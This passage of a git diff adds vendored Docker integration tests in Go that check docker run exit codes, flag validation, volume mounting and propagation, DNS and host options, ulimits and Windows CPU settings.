%v", expected, out, exitCode) + } +} + +func (s *DockerSuite) TestRunWrongCpusetMemsFlagValue(c *check.C) { + // TODO Windows: This needs validation (error out) in the daemon. 
+ testRequires(c, DaemonIsLinux) + out, exitCode, err := dockerCmdWithError("run", "--cpuset-mems", "1-42--", "busybox", "true") + c.Assert(err, check.NotNil) + expected := "Error response from daemon: Invalid value 1-42-- for cpuset mems.\n" + if !(strings.Contains(out, expected) || exitCode == 125) { + c.Fatalf("Expected output to contain %q with exitCode 125, got out: %q exitCode: %v", expected, out, exitCode) + } +} + +// TestRunNonExecutableCmd checks that 'docker run busybox foo' exits with error code 127' +func (s *DockerSuite) TestRunNonExecutableCmd(c *check.C) { + name := "testNonExecutableCmd" + runCmd := exec.Command(dockerBinary, "run", "--name", name, "busybox", "foo") + _, exit, _ := runCommandWithOutput(runCmd) + stateExitCode := findContainerExitCode(c, name) + if !(exit == 127 && strings.Contains(stateExitCode, "127")) { + c.Fatalf("Run non-executable command should have errored with exit code 127, but we got exit: %d, State.ExitCode: %s", exit, stateExitCode) + } +} + +// TestRunNonExistingCmd checks that 'docker run busybox /bin/foo' exits with code 127. +func (s *DockerSuite) TestRunNonExistingCmd(c *check.C) { + name := "testNonExistingCmd" + runCmd := exec.Command(dockerBinary, "run", "--name", name, "busybox", "/bin/foo") + _, exit, _ := runCommandWithOutput(runCmd) + stateExitCode := findContainerExitCode(c, name) + if !(exit == 127 && strings.Contains(stateExitCode, "127")) { + c.Fatalf("Run non-existing command should have errored with exit code 127, but we got exit: %d, State.ExitCode: %s", exit, stateExitCode) + } +} + +// TestCmdCannotBeInvoked checks that 'docker run busybox /etc' exits with 126, or +// 127 on Windows. The difference is that in Windows, the container must be started +// as that's when the check is made (and yes, by its design...) 
+func (s *DockerSuite) TestCmdCannotBeInvoked(c *check.C) { + expected := 126 + if daemonPlatform == "windows" { + expected = 127 + } + name := "testCmdCannotBeInvoked" + runCmd := exec.Command(dockerBinary, "run", "--name", name, "busybox", "/etc") + _, exit, _ := runCommandWithOutput(runCmd) + stateExitCode := findContainerExitCode(c, name) + if !(exit == expected && strings.Contains(stateExitCode, strconv.Itoa(expected))) { + c.Fatalf("Run cmd that cannot be invoked should have errored with code %d, but we got exit: %d, State.ExitCode: %s", expected, exit, stateExitCode) + } +} + +// TestRunNonExistingImage checks that 'docker run foo' exits with error msg 125 and contains 'Unable to find image' +func (s *DockerSuite) TestRunNonExistingImage(c *check.C) { + runCmd := exec.Command(dockerBinary, "run", "foo") + out, exit, err := runCommandWithOutput(runCmd) + if !(err != nil && exit == 125 && strings.Contains(out, "Unable to find image")) { + c.Fatalf("Run non-existing image should have errored with 'Unable to find image' code 125, but we got out: %s, exit: %d, err: %s", out, exit, err) + } +} + +// TestDockerFails checks that 'docker run -foo busybox' exits with 125 to signal docker run failed +func (s *DockerSuite) TestDockerFails(c *check.C) { + runCmd := exec.Command(dockerBinary, "run", "-foo", "busybox") + out, exit, err := runCommandWithOutput(runCmd) + if !(err != nil && exit == 125) { + c.Fatalf("Docker run with flag not defined should exit with 125, but we got out: %s, exit: %d, err: %s", out, exit, err) + } +} + +// TestRunInvalidReference invokes docker run with a bad reference. 
+func (s *DockerSuite) TestRunInvalidReference(c *check.C) { + out, exit, _ := dockerCmdWithError("run", "busybox@foo") + if exit == 0 { + c.Fatalf("expected non-zero exist code; received %d", exit) + } + + if !strings.Contains(out, "Error parsing reference") { + c.Fatalf(`Expected "Error parsing reference" in output; got: %s`, out) + } +} + +// Test fix for issue #17854 +func (s *DockerSuite) TestRunInitLayerPathOwnership(c *check.C) { + // Not applicable on Windows as it does not support Linux uid/gid ownership + testRequires(c, DaemonIsLinux) + name := "testetcfileownership" + _, err := buildImage(name, + `FROM busybox + RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd + RUN echo 'dockerio:x:1001:' >> /etc/group + RUN chown dockerio:dockerio /etc`, + true) + if err != nil { + c.Fatal(err) + } + + // Test that dockerio ownership of /etc is retained at runtime + out, _ := dockerCmd(c, "run", "--rm", name, "stat", "-c", "%U:%G", "/etc") + out = strings.TrimSpace(out) + if out != "dockerio:dockerio" { + c.Fatalf("Wrong /etc ownership: expected dockerio:dockerio, got %q", out) + } +} + +func (s *DockerSuite) TestRunWithOomScoreAdj(c *check.C) { + testRequires(c, DaemonIsLinux) + + expected := "642" + out, _ := dockerCmd(c, "run", "--oom-score-adj", expected, "busybox", "cat", "/proc/self/oom_score_adj") + oomScoreAdj := strings.TrimSpace(out) + if oomScoreAdj != "642" { + c.Fatalf("Expected oom_score_adj set to %q, got %q instead", expected, oomScoreAdj) + } +} + +func (s *DockerSuite) TestRunWithOomScoreAdjInvalidRange(c *check.C) { + testRequires(c, DaemonIsLinux) + + out, _, err := dockerCmdWithError("run", "--oom-score-adj", "1001", "busybox", "true") + c.Assert(err, check.NotNil) + expected := "Invalid value 1001, range for oom score adj is [-1000, 1000]." 
+ if !strings.Contains(out, expected) { + c.Fatalf("Expected output to contain %q, got %q instead", expected, out) + } + out, _, err = dockerCmdWithError("run", "--oom-score-adj", "-1001", "busybox", "true") + c.Assert(err, check.NotNil) + expected = "Invalid value -1001, range for oom score adj is [-1000, 1000]." + if !strings.Contains(out, expected) { + c.Fatalf("Expected output to contain %q, got %q instead", expected, out) + } +} + +func (s *DockerSuite) TestRunVolumesMountedAsShared(c *check.C) { + // Volume propagation is linux only. Also it creates directories for + // bind mounting, so needs to be same host. + testRequires(c, DaemonIsLinux, SameHostDaemon, NotUserNamespace) + + // Prepare a source directory to bind mount + tmpDir, err := ioutil.TempDir("", "volume-source") + if err != nil { + c.Fatal(err) + } + defer os.RemoveAll(tmpDir) + + if err := os.Mkdir(path.Join(tmpDir, "mnt1"), 0755); err != nil { + c.Fatal(err) + } + + // Convert this directory into a shared mount point so that we do + // not rely on propagation properties of parent mount. + cmd := exec.Command("mount", "--bind", tmpDir, tmpDir) + if _, err = runCommand(cmd); err != nil { + c.Fatal(err) + } + + cmd = exec.Command("mount", "--make-private", "--make-shared", tmpDir) + if _, err = runCommand(cmd); err != nil { + c.Fatal(err) + } + + dockerCmd(c, "run", "--privileged", "-v", fmt.Sprintf("%s:/volume-dest:shared", tmpDir), "busybox", "mount", "--bind", "/volume-dest/mnt1", "/volume-dest/mnt1") + + // Make sure a bind mount under a shared volume propagated to host. + if mounted, _ := mount.Mounted(path.Join(tmpDir, "mnt1")); !mounted { + c.Fatalf("Bind mount under shared volume did not propagate to host") + } + + mount.Unmount(path.Join(tmpDir, "mnt1")) +} + +func (s *DockerSuite) TestRunVolumesMountedAsSlave(c *check.C) { + // Volume propagation is linux only. Also it creates directories for + // bind mounting, so needs to be same host. 
+ testRequires(c, DaemonIsLinux, SameHostDaemon, NotUserNamespace) + + // Prepare a source directory to bind mount + tmpDir, err := ioutil.TempDir("", "volume-source") + if err != nil { + c.Fatal(err) + } + defer os.RemoveAll(tmpDir) + + if err := os.Mkdir(path.Join(tmpDir, "mnt1"), 0755); err != nil { + c.Fatal(err) + } + + // Prepare a source directory with file in it. We will bind mount this + // directory and see if file shows up. + tmpDir2, err := ioutil.TempDir("", "volume-source2") + if err != nil { + c.Fatal(err) + } + defer os.RemoveAll(tmpDir2) + + if err := ioutil.WriteFile(path.Join(tmpDir2, "slave-testfile"), []byte("Test"), 0644); err != nil { + c.Fatal(err) + } + + // Convert this directory into a shared mount point so that we do + // not rely on propagation properties of parent mount. + cmd := exec.Command("mount", "--bind", tmpDir, tmpDir) + if _, err = runCommand(cmd); err != nil { + c.Fatal(err) + } + + cmd = exec.Command("mount", "--make-private", "--make-shared", tmpDir) + if _, err = runCommand(cmd); err != nil { + c.Fatal(err) + } + + dockerCmd(c, "run", "-i", "-d", "--name", "parent", "-v", fmt.Sprintf("%s:/volume-dest:slave", tmpDir), "busybox", "top") + + // Bind mount tmpDir2/ onto tmpDir/mnt1. 
If mount propagates inside + // container then contents of tmpDir2/slave-testfile should become + // visible at "/volume-dest/mnt1/slave-testfile" + cmd = exec.Command("mount", "--bind", tmpDir2, path.Join(tmpDir, "mnt1")) + if _, err = runCommand(cmd); err != nil { + c.Fatal(err) + } + + out, _ := dockerCmd(c, "exec", "parent", "cat", "/volume-dest/mnt1/slave-testfile") + + mount.Unmount(path.Join(tmpDir, "mnt1")) + + if out != "Test" { + c.Fatalf("Bind mount under slave volume did not propagate to container") + } +} + +func (s *DockerSuite) TestRunNamedVolumesMountedAsShared(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + out, exitCode, _ := dockerCmdWithError("run", "-v", "foo:/test:shared", "busybox", "touch", "/test/somefile") + c.Assert(exitCode, checker.Not(checker.Equals), 0) + c.Assert(out, checker.Contains, "invalid mount config") +} + +func (s *DockerSuite) TestRunNamedVolumeCopyImageData(c *check.C) { + testRequires(c, DaemonIsLinux) + + testImg := "testvolumecopy" + _, err := buildImage(testImg, ` + FROM busybox + RUN mkdir -p /foo && echo hello > /foo/hello + `, true) + c.Assert(err, check.IsNil) + + dockerCmd(c, "run", "-v", "foo:/foo", testImg) + out, _ := dockerCmd(c, "run", "-v", "foo:/foo", "busybox", "cat", "/foo/hello") + c.Assert(strings.TrimSpace(out), check.Equals, "hello") +} + +func (s *DockerSuite) TestRunNamedVolumeNotRemoved(c *check.C) { + prefix, _ := getPrefixAndSlashFromDaemonPlatform() + + dockerCmd(c, "volume", "create", "test") + + dockerCmd(c, "run", "--rm", "-v", "test:"+prefix+"/foo", "-v", prefix+"/bar", "busybox", "true") + dockerCmd(c, "volume", "inspect", "test") + out, _ := dockerCmd(c, "volume", "ls", "-q") + c.Assert(strings.TrimSpace(out), checker.Equals, "test") + + dockerCmd(c, "run", "--name=test", "-v", "test:"+prefix+"/foo", "-v", prefix+"/bar", "busybox", "true") + dockerCmd(c, "rm", "-fv", "test") + dockerCmd(c, "volume", "inspect", "test") + out, _ = dockerCmd(c, "volume", "ls", "-q") + 
c.Assert(strings.TrimSpace(out), checker.Equals, "test") +} + +func (s *DockerSuite) TestRunNamedVolumesFromNotRemoved(c *check.C) { + prefix, _ := getPrefixAndSlashFromDaemonPlatform() + + dockerCmd(c, "volume", "create", "test") + dockerCmd(c, "run", "--name=parent", "-v", "test:"+prefix+"/foo", "-v", prefix+"/bar", "busybox", "true") + dockerCmd(c, "run", "--name=child", "--volumes-from=parent", "busybox", "true") + + // Remove the parent so there are not other references to the volumes + dockerCmd(c, "rm", "-f", "parent") + // now remove the child and ensure the named volume (and only the named volume) still exists + dockerCmd(c, "rm", "-fv", "child") + dockerCmd(c, "volume", "inspect", "test") + out, _ := dockerCmd(c, "volume", "ls", "-q") + c.Assert(strings.TrimSpace(out), checker.Equals, "test") +} + +func (s *DockerSuite) TestRunAttachFailedNoLeak(c *check.C) { + nroutines, err := getGoroutineNumber() + c.Assert(err, checker.IsNil) + + runSleepingContainer(c, "--name=test", "-p", "8000:8000") + + // Wait until container is fully up and running + c.Assert(waitRun("test"), check.IsNil) + + out, _, err := dockerCmdWithError("run", "--name=fail", "-p", "8000:8000", "busybox", "true") + // We will need the following `inspect` to diagnose the issue if test fails (#21247) + out1, err1 := dockerCmd(c, "inspect", "--format", "{{json .State}}", "test") + out2, err2 := dockerCmd(c, "inspect", "--format", "{{json .State}}", "fail") + c.Assert(err, checker.NotNil, check.Commentf("Command should have failed but succeeded with: %s\nContainer 'test' [%+v]: %s\nContainer 'fail' [%+v]: %s", out, err1, out1, err2, out2)) + // check for windows error as well + // TODO Windows Post TP5. 
Fix the error message string + c.Assert(strings.Contains(string(out), "port is already allocated") || + strings.Contains(string(out), "were not connected because a duplicate name exists") || + strings.Contains(string(out), "HNS failed with error : Failed to create endpoint") || + strings.Contains(string(out), "HNS failed with error : The object already exists"), checker.Equals, true, check.Commentf("Output: %s", out)) + dockerCmd(c, "rm", "-f", "test") + + // NGoroutines is not updated right away, so we need to wait before failing + c.Assert(waitForGoroutines(nroutines), checker.IsNil) +} + +// Test for one character directory name case (#20122) +func (s *DockerSuite) TestRunVolumeWithOneCharacter(c *check.C) { + testRequires(c, DaemonIsLinux) + + out, _ := dockerCmd(c, "run", "-v", "/tmp/q:/foo", "busybox", "sh", "-c", "find /foo") + c.Assert(strings.TrimSpace(out), checker.Equals, "/foo") +} + +func (s *DockerSuite) TestRunVolumeCopyFlag(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows does not support copying data from image to the volume + _, err := buildImage("volumecopy", + `FROM busybox + RUN mkdir /foo && echo hello > /foo/bar + CMD cat /foo/bar`, + true, + ) + c.Assert(err, checker.IsNil) + + dockerCmd(c, "volume", "create", "test") + + // test with the nocopy flag + out, _, err := dockerCmdWithError("run", "-v", "test:/foo:nocopy", "volumecopy") + c.Assert(err, checker.NotNil, check.Commentf(out)) + // test default behavior which is to copy for non-binds + out, _ = dockerCmd(c, "run", "-v", "test:/foo", "volumecopy") + c.Assert(strings.TrimSpace(out), checker.Equals, "hello") + // error out when the volume is already populated + out, _, err = dockerCmdWithError("run", "-v", "test:/foo:copy", "volumecopy") + c.Assert(err, checker.NotNil, check.Commentf(out)) + // do not error out when copy isn't explicitly set even though it's already populated + out, _ = dockerCmd(c, "run", "-v", "test:/foo", "volumecopy") + c.Assert(strings.TrimSpace(out), 
checker.Equals, "hello") + + // do not allow copy modes on volumes-from + dockerCmd(c, "run", "--name=test", "-v", "/foo", "busybox", "true") + out, _, err = dockerCmdWithError("run", "--volumes-from=test:copy", "busybox", "true") + c.Assert(err, checker.NotNil, check.Commentf(out)) + out, _, err = dockerCmdWithError("run", "--volumes-from=test:nocopy", "busybox", "true") + c.Assert(err, checker.NotNil, check.Commentf(out)) + + // do not allow copy modes on binds + out, _, err = dockerCmdWithError("run", "-v", "/foo:/bar:copy", "busybox", "true") + c.Assert(err, checker.NotNil, check.Commentf(out)) + out, _, err = dockerCmdWithError("run", "-v", "/foo:/bar:nocopy", "busybox", "true") + c.Assert(err, checker.NotNil, check.Commentf(out)) +} + +// Test case for #21976 +func (s *DockerSuite) TestRunDNSInHostMode(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + + expectedOutput := "nameserver 127.0.0.1" + expectedWarning := "Localhost DNS setting" + out, stderr, _ := dockerCmdWithStdoutStderr(c, "run", "--dns=127.0.0.1", "--net=host", "busybox", "cat", "/etc/resolv.conf") + c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) + c.Assert(stderr, checker.Contains, expectedWarning, check.Commentf("Expected warning on stderr about localhost resolver, but got %q", stderr)) + + expectedOutput = "nameserver 1.2.3.4" + out, _ = dockerCmd(c, "run", "--dns=1.2.3.4", "--net=host", "busybox", "cat", "/etc/resolv.conf") + c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) + + expectedOutput = "search example.com" + out, _ = dockerCmd(c, "run", "--dns-search=example.com", "--net=host", "busybox", "cat", "/etc/resolv.conf") + c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) + + expectedOutput = "options timeout:3" + out, _ = dockerCmd(c, "run", "--dns-opt=timeout:3", "--net=host", 
"busybox", "cat", "/etc/resolv.conf") + c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) + + expectedOutput1 := "nameserver 1.2.3.4" + expectedOutput2 := "search example.com" + expectedOutput3 := "options timeout:3" + out, _ = dockerCmd(c, "run", "--dns=1.2.3.4", "--dns-search=example.com", "--dns-opt=timeout:3", "--net=host", "busybox", "cat", "/etc/resolv.conf") + c.Assert(out, checker.Contains, expectedOutput1, check.Commentf("Expected '%s', but got %q", expectedOutput1, out)) + c.Assert(out, checker.Contains, expectedOutput2, check.Commentf("Expected '%s', but got %q", expectedOutput2, out)) + c.Assert(out, checker.Contains, expectedOutput3, check.Commentf("Expected '%s', but got %q", expectedOutput3, out)) +} + +// Test case for #21976 +func (s *DockerSuite) TestRunAddHostInHostMode(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + + expectedOutput := "1.2.3.4\textra" + out, _ := dockerCmd(c, "run", "--add-host=extra:1.2.3.4", "--net=host", "busybox", "cat", "/etc/hosts") + c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) +} + +func (s *DockerSuite) TestRunRmAndWait(c *check.C) { + dockerCmd(c, "run", "--name=test", "--rm", "-d", "busybox", "sh", "-c", "sleep 3;exit 2") + + out, code, err := dockerCmdWithError("wait", "test") + c.Assert(err, checker.IsNil, check.Commentf("out: %s; exit code: %d", out, code)) + c.Assert(out, checker.Equals, "2\n", check.Commentf("exit code: %d", code)) + c.Assert(code, checker.Equals, 0) +} + +// Test case for #23498 +func (s *DockerSuite) TestRunUnsetEntrypoint(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "test-entrypoint" + dockerfile := `FROM busybox +ADD entrypoint.sh /entrypoint.sh +RUN chmod 755 /entrypoint.sh +ENTRYPOINT ["/entrypoint.sh"] +CMD echo foobar` + + ctx, err := fakeContext(dockerfile, map[string]string{ + "entrypoint.sh": `#!/bin/sh +echo "I am an 
entrypoint" +exec "$@"`, + }) + c.Assert(err, check.IsNil) + defer ctx.Close() + + _, err = buildImageFromContext(name, ctx, true) + c.Assert(err, check.IsNil) + + out, _ := dockerCmd(c, "run", "--entrypoint=", "-t", name, "echo", "foo") + c.Assert(strings.TrimSpace(out), check.Equals, "foo") + + // CMD will be reset as well (the same as setting a custom entrypoint) + _, _, err = dockerCmdWithError("run", "--entrypoint=", "-t", name) + c.Assert(err, check.NotNil) + c.Assert(err.Error(), checker.Contains, "No command specified") +} + +func (s *DockerDaemonSuite) TestRunWithUlimitAndDaemonDefault(c *check.C) { + c.Assert(s.d.StartWithBusybox("--debug", "--default-ulimit=nofile=65535"), checker.IsNil) + + name := "test-A" + _, err := s.d.Cmd("run", "--name", name, "-d", "busybox", "top") + c.Assert(err, checker.IsNil) + c.Assert(s.d.waitRun(name), check.IsNil) + + out, err := s.d.Cmd("inspect", "--format", "{{.HostConfig.Ulimits}}", name) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "[nofile=65535:65535]") + + name = "test-B" + _, err = s.d.Cmd("run", "--name", name, "--ulimit=nofile=42", "-d", "busybox", "top") + c.Assert(err, checker.IsNil) + c.Assert(s.d.waitRun(name), check.IsNil) + + out, err = s.d.Cmd("inspect", "--format", "{{.HostConfig.Ulimits}}", name) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "[nofile=42:42]") +} + +func (s *DockerSuite) TestRunStoppedLoggingDriverNoLeak(c *check.C) { + nroutines, err := getGoroutineNumber() + c.Assert(err, checker.IsNil) + + out, _, err := dockerCmdWithError("run", "--name=fail", "--log-driver=splunk", "busybox", "true") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "Failed to initialize logging driver", check.Commentf("error should be about logging driver, got output %s", out)) + + // NGoroutines is not updated right away, so we need to wait before failing + c.Assert(waitForGoroutines(nroutines), checker.IsNil) +} + +// Handles error conditions for 
--credentialspec. Validating E2E success cases +// requires additional infrastructure (AD for example) on CI servers. +func (s *DockerSuite) TestRunCredentialSpecFailures(c *check.C) { + testRequires(c, DaemonIsWindows) + attempts := []struct{ value, expectedError string }{ + {"rubbish", "invalid credential spec security option - value must be prefixed file:// or registry://"}, + {"rubbish://", "invalid credential spec security option - value must be prefixed file:// or registry://"}, + {"file://", "no value supplied for file:// credential spec security option"}, + {"registry://", "no value supplied for registry:// credential spec security option"}, + {`file://c:\blah.txt`, "path cannot be absolute"}, + {`file://doesnotexist.txt`, "The system cannot find the file specified"}, + } + for _, attempt := range attempts { + _, _, err := dockerCmdWithError("run", "--security-opt=credentialspec="+attempt.value, "busybox", "true") + c.Assert(err, checker.NotNil, check.Commentf("%s expected non-nil err", attempt.value)) + c.Assert(err.Error(), checker.Contains, attempt.expectedError, check.Commentf("%s expected %s got %s", attempt.value, attempt.expectedError, err)) + } +} + +// Windows specific test to validate credential specs with a well-formed spec. +// Note it won't actually do anything in CI configuration with the spec, but +// it should not fail to run a container. +func (s *DockerSuite) TestRunCredentialSpecWellFormed(c *check.C) { + testRequires(c, DaemonIsWindows, SameHostDaemon) + validCS := readFile(`fixtures\credentialspecs\valid.json`, c) + writeFile(filepath.Join(dockerBasePath, `credentialspecs\valid.json`), validCS, c) + dockerCmd(c, "run", `--security-opt=credentialspec=file://valid.json`, "busybox", "true") +} + +// Windows specific test to ensure that a servicing app container is started +// if necessary once a container exits. 
It does this by forcing a no-op +// servicing event and verifying the event from Hyper-V-Compute +func (s *DockerSuite) TestRunServicingContainer(c *check.C) { + testRequires(c, DaemonIsWindows, SameHostDaemon) + + out, _ := dockerCmd(c, "run", "-d", WindowsBaseImage, "cmd", "/c", "mkdir c:\\programdata\\Microsoft\\Windows\\ContainerUpdates\\000_000_d99f45d0-ffc8-4af7-bd9c-ea6a62e035c9_200 && sc control cexecsvc 255") + containerID := strings.TrimSpace(out) + err := waitExited(containerID, 60*time.Second) + c.Assert(err, checker.IsNil) + + cmd := exec.Command("powershell", "echo", `(Get-WinEvent -ProviderName "Microsoft-Windows-Hyper-V-Compute" -FilterXPath 'Event[System[EventID=2010]]' -MaxEvents 1).Message`) + out2, _, err := runCommandWithOutput(cmd) + c.Assert(err, checker.IsNil) + c.Assert(out2, checker.Contains, `"Servicing":true`, check.Commentf("Servicing container does not appear to have been started: %s", out2)) + c.Assert(out2, checker.Contains, `Windows Container (Servicing)`, check.Commentf("Didn't find 'Windows Container (Servicing): %s", out2)) + c.Assert(out2, checker.Contains, containerID+"_servicing", check.Commentf("Didn't find '%s_servicing': %s", containerID+"_servicing", out2)) +} + +func (s *DockerSuite) TestRunDuplicateMount(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace) + + tmpFile, err := ioutil.TempFile("", "touch-me") + c.Assert(err, checker.IsNil) + defer tmpFile.Close() + + data := "touch-me-foo-bar\n" + if _, err := tmpFile.Write([]byte(data)); err != nil { + c.Fatal(err) + } + + name := "test" + out, _ := dockerCmd(c, "run", "--name", name, "-v", "/tmp:/tmp", "-v", "/tmp:/tmp", "busybox", "sh", "-c", "cat "+tmpFile.Name()+" && ls /") + c.Assert(out, checker.Not(checker.Contains), "tmp:") + c.Assert(out, checker.Contains, data) + + out = inspectFieldJSON(c, name, "Config.Volumes") + c.Assert(out, checker.Contains, "null") +} + +func (s *DockerSuite) TestRunWindowsWithCPUCount(c *check.C) { + 
testRequires(c, DaemonIsWindows) + + out, _ := dockerCmd(c, "run", "--cpu-count=1", "--name", "test", "busybox", "echo", "testing") + c.Assert(strings.TrimSpace(out), checker.Equals, "testing") + + out = inspectField(c, "test", "HostConfig.CPUCount") + c.Assert(out, check.Equals, "1") +} + +func (s *DockerSuite) TestRunWindowsWithCPUShares(c *check.C) { + testRequires(c, DaemonIsWindows) + + out, _ := dockerCmd(c, "run", "--cpu-shares=1000", "--name", "test", "busybox", "echo", "testing") + c.Assert(strings.TrimSpace(out), checker.Equals, "testing") + + out = inspectField(c, "test", "HostConfig.CPUShares") + c.Assert(out, check.Equals, "1000") +} + +func (s *DockerSuite) TestRunWindowsWithCPUPercent(c *check.C) { + testRequires(c, DaemonIsWindows) + + out, _ := dockerCmd(c, "run", "--cpu-percent=80", "--name", "test", "busybox", "echo", "testing") + c.Assert(strings.TrimSpace(out), checker.Equals, "testing") + + out = inspectField(c, "test", "HostConfig.CPUPercent") + c.Assert(out, check.Equals, "80") +} + +func (s *DockerSuite) TestRunProcessIsolationWithCPUCountCPUSharesAndCPUPercent(c *check.C) { + testRequires(c, DaemonIsWindows, IsolationIsProcess) + + out, _ := dockerCmd(c, "run", "--cpu-count=1", "--cpu-shares=1000", "--cpu-percent=80", "--name", "test", "busybox", "echo", "testing") + c.Assert(strings.TrimSpace(out), checker.Contains, "WARNING: Conflicting options: CPU count takes priority over CPU shares on Windows Server Containers. CPU shares discarded") + c.Assert(strings.TrimSpace(out), checker.Contains, "WARNING: Conflicting options: CPU count takes priority over CPU percent on Windows Server Containers. 
CPU percent discarded") + c.Assert(strings.TrimSpace(out), checker.Contains, "testing") + + out = inspectField(c, "test", "HostConfig.CPUCount") + c.Assert(out, check.Equals, "1") + + out = inspectField(c, "test", "HostConfig.CPUShares") + c.Assert(out, check.Equals, "0") + + out = inspectField(c, "test", "HostConfig.CPUPercent") + c.Assert(out, check.Equals, "0") +} + +func (s *DockerSuite) TestRunHypervIsolationWithCPUCountCPUSharesAndCPUPercent(c *check.C) { + testRequires(c, DaemonIsWindows, IsolationIsHyperv) + + out, _ := dockerCmd(c, "run", "--cpu-count=1", "--cpu-shares=1000", "--cpu-percent=80", "--name", "test", "busybox", "echo", "testing") + c.Assert(strings.TrimSpace(out), checker.Contains, "testing") + + out = inspectField(c, "test", "HostConfig.CPUCount") + c.Assert(out, check.Equals, "1") + + out = inspectField(c, "test", "HostConfig.CPUShares") + c.Assert(out, check.Equals, "1000") + + out = inspectField(c, "test", "HostConfig.CPUPercent") + c.Assert(out, check.Equals, "80") +} + +// Test for #25099 +func (s *DockerSuite) TestRunEmptyEnv(c *check.C) { + testRequires(c, DaemonIsLinux) + + expectedOutput := "invalid environment variable:" + + out, _, err := dockerCmdWithError("run", "-e", "", "busybox", "true") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, expectedOutput) + + out, _, err = dockerCmdWithError("run", "-e", "=", "busybox", "true") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, expectedOutput) + + out, _, err = dockerCmdWithError("run", "-e", "=foo", "busybox", "true") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, expectedOutput) +} + +// #28658 +func (s *DockerSuite) TestSlowStdinClosing(c *check.C) { + name := "testslowstdinclosing" + repeat := 3 // regression happened 50% of the time + for i := 0; i < repeat; i++ { + cmd := exec.Command(dockerBinary, "run", "--rm", "--name", name, "-i", "busybox", "cat") + cmd.Stdin = &delayedReader{} + done := make(chan error, 1) + go func() 
{ + _, err := runCommand(cmd) + done <- err + }() + + select { + case <-time.After(15 * time.Second): + c.Fatal("running container timed out") // cleanup in teardown + case err := <-done: + c.Assert(err, checker.IsNil) + } + } +} + +type delayedReader struct{} + +func (s *delayedReader) Read([]byte) (int, error) { + time.Sleep(500 * time.Millisecond) + return 0, io.EOF +} + +// #28823 (originally #28639) +func (s *DockerSuite) TestRunMountReadOnlyDevShm(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + emptyDir, err := ioutil.TempDir("", "test-read-only-dev-shm") + c.Assert(err, check.IsNil) + defer os.RemoveAll(emptyDir) + out, _, err := dockerCmdWithError("run", "--rm", "--read-only", + "-v", fmt.Sprintf("%s:/dev/shm:ro", emptyDir), + "busybox", "touch", "/dev/shm/foo") + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Read-only file system") +} + +// Test case for 29129 +func (s *DockerSuite) TestRunHostnameInHostMode(c *check.C) { + testRequires(c, DaemonIsLinux) + + expectedOutput := "foobar\nfoobar" + out, _ := dockerCmd(c, "run", "--net=host", "--hostname=foobar", "busybox", "sh", "-c", `echo $HOSTNAME && hostname`) + c.Assert(strings.TrimSpace(out), checker.Equals, expectedOutput) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_run_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_run_unix_test.go new file mode 100644 index 0000000000..e346c19f8e --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_run_unix_test.go @@ -0,0 +1,1592 @@ +// +build !windows + +package main + +import ( + "bufio" + "encoding/json" + "fmt" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "regexp" + "strconv" + "strings" + "syscall" + "time" + + "github.com/docker/docker/pkg/homedir" + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/mount" + "github.com/docker/docker/pkg/parsers" + 
"github.com/docker/docker/pkg/sysinfo" + "github.com/go-check/check" + "github.com/kr/pty" +) + +// #6509 +func (s *DockerSuite) TestRunRedirectStdout(c *check.C) { + checkRedirect := func(command string) { + _, tty, err := pty.Open() + c.Assert(err, checker.IsNil, check.Commentf("Could not open pty")) + cmd := exec.Command("sh", "-c", command) + cmd.Stdin = tty + cmd.Stdout = tty + cmd.Stderr = tty + c.Assert(cmd.Start(), checker.IsNil) + ch := make(chan error) + go func() { + ch <- cmd.Wait() + close(ch) + }() + + select { + case <-time.After(10 * time.Second): + c.Fatal("command timeout") + case err := <-ch: + c.Assert(err, checker.IsNil, check.Commentf("wait err")) + } + } + + checkRedirect(dockerBinary + " run -i busybox cat /etc/passwd | grep -q root") + checkRedirect(dockerBinary + " run busybox cat /etc/passwd | grep -q root") +} + +// Test recursive bind mount works by default +func (s *DockerSuite) TestRunWithVolumesIsRecursive(c *check.C) { + // /tmp gets permission denied + testRequires(c, NotUserNamespace, SameHostDaemon) + tmpDir, err := ioutil.TempDir("", "docker_recursive_mount_test") + c.Assert(err, checker.IsNil) + + defer os.RemoveAll(tmpDir) + + // Create a temporary tmpfs mount. + tmpfsDir := filepath.Join(tmpDir, "tmpfs") + c.Assert(os.MkdirAll(tmpfsDir, 0777), checker.IsNil, check.Commentf("failed to mkdir at %s", tmpfsDir)) + c.Assert(mount.Mount("tmpfs", tmpfsDir, "tmpfs", ""), checker.IsNil, check.Commentf("failed to create a tmpfs mount at %s", tmpfsDir)) + + f, err := ioutil.TempFile(tmpfsDir, "touch-me") + c.Assert(err, checker.IsNil) + defer f.Close() + + runCmd := exec.Command(dockerBinary, "run", "--name", "test-data", "--volume", fmt.Sprintf("%s:/tmp:ro", tmpDir), "busybox:latest", "ls", 